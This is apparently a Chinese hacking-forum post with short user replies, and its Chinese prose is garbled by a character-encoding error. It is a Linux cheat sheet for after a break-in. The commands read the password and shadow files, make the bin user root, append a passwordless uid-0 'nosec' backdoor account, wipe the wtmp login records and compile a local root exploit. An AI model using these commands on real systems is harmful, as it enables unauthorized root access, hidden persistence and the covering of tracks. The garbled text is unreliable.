cat /etc/passwd ²é¿´linuxÓû§
cat /etc/shadow ²é¿´Óû§ÃÜÂëÐèÒªrootȨÏÞ
cat /etc/sysconfig/network-scripts/ifcfg-ethn N´ú±íÍø¿¨ºÅ ²é¿´ËùÔÚÍø¿¨µÄipÐÅÏ¢
ifconfig ²é¿´±¾»úipÐÅÏ¢
cat /etc/resolv.conf ²é¿´DNSÐÅÏ¢
bash -i ÔÚ·´µ¯µÄshellÖÐʹÓÿÉÒÔÖ±¹ÛÏÔʾÃüÁî
bash prompt: µ±ÄãÒÔÆÕͨÏÞȨÓû§Éí·Ý½øÈëµÄʱºò£¬Ò»°ãÄã»áÓÐÒ»¸öÀàËÆbash$µÄprompt¡£µ±ÄãÒÔRootµÇ½ʱ£¬ÄãµÄprompt»á±ä³É
bash#¡£
ϵͳ±äÁ¿ : ÊÔ×Åecho "$USER / $EUID" ϵͳӦ¸Ã»á¸æËßÄãËüÈÏΪÄãÊÇʲôÓû§¡£
echo 1>/proc/sys/net/ipv4/if_forwardÊDz»ÊÇÄãд´íÁË,Ó¦¸ÃÊÇecho 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward °É,ĬÈÏÊÇ0,Ò²¾ÍÊÇÄں˲»½øÐÐÊý¾Ý°ü¹ýÂË,¸ÄΪ1 ,ÈÃÄں˶ÔÊý¾Ý°ü½øÐÐfilter´¦Àí!
netstat -an |grep LISTEN |grep :80 ²é¿´¶Ë¿Ú
service --status-all | grep running
service --status-all | grep http
²é¿´ÔËÐзþÎñ
lsb_release -a ²é¿´ÏµÍ³°æ±¾
ÖØÆôssh·þÎñ £º/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_configÎļþÀï
PasswordAuthentication no,
½«Æä¸ÄΪ
PasswordAuthentication yes
Ô¶³Ìssh²Å¿ÉµÇ¼
·ñÔòÏÔʾAccess denied
ÆäÖÐUsepam yes¿ÉÄÜÓÃÀ´½¨Á¢pam·½Ê½login£¬±ÈÈç´ÓÆäËülinuxÖ÷»ússhµ½·þÎñ¶Ë£¬Èç¹û¹Ø±Õ£¬Ôò²»ÄÜ´ò¿ª.
suµÄ²ËÄñÓ÷¨
ÏÈchomod 777 /etc/passwd
È»ºóÐÞ¸ÄbinÓû§µÄgidºÍuidΪ0
È»ºópasswdÉèÖÃbinµÄÃÜÂë
È»ºócp /bin/bash /sbin/nologin
È»ºósuµÄʱºòsu - bin¾Í¿ÉÒÔµ½rootshellÁË¡£
Õâ¸öÔÀí¾ÍÊǵ±ssh²»ÔÊÐírootÓÃsshÖն˵ǽµÄʱºò£¬ÎÒÃÇÓÖ²»ÖªµÀrootÃÜÂ룬µÄÒ»ÖֺܲËÄñµÄ×ö·¨
»¹¿ÉÒÔÕâÑù
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c -o local -static -Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
Çå¿Õlast¼Ç¼ cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 ½¨Á¢Ò»¸ö100mµÄ´óÎļþÔÚÀûÓÃLinux Kernel <= 2.6.17.4 (proc) Local Root ExploitÌáȨµÄʱºòÒªÓõ½µÄ


kantiede ÓÚ 2010-01-31 14:45:34·¢±í:
ѧϰ
aqq5220 ÓÚ 2010-01-29 18:35:18·¢±í:
¹þ¹þ£¬É³·¢ËµµÄºÃ£¡
duo2752 ÓÚ 2010-01-29 15:02:38·¢±í:
ʲôÊÖ¶¼Ó¦¸Ã¿´¿´
ftp0000 ÓÚ 2010-01-29 12:47:33·¢±í:
2# xlniva
ÊÇѽ£¬Ïµ½ÁË{:3_121:}
skypeng ÓÚ 2010-01-29 11:20:35·¢±í:
ÊʺÏÐÂÊÖ
ainiaa ÓÚ 2010-01-29 11:15:15·¢±í:
¶àлlzµÄ·ÖÏí¡£
ÐÂÊÖ¡£
ÕýÏë½ø¾üliunx
xlniva ÓÚ 2010-01-27 08:10:58·¢±í:
Õ⻹²»Ïŵ¹ÏëÓÃlinuxµÄÈ˹þ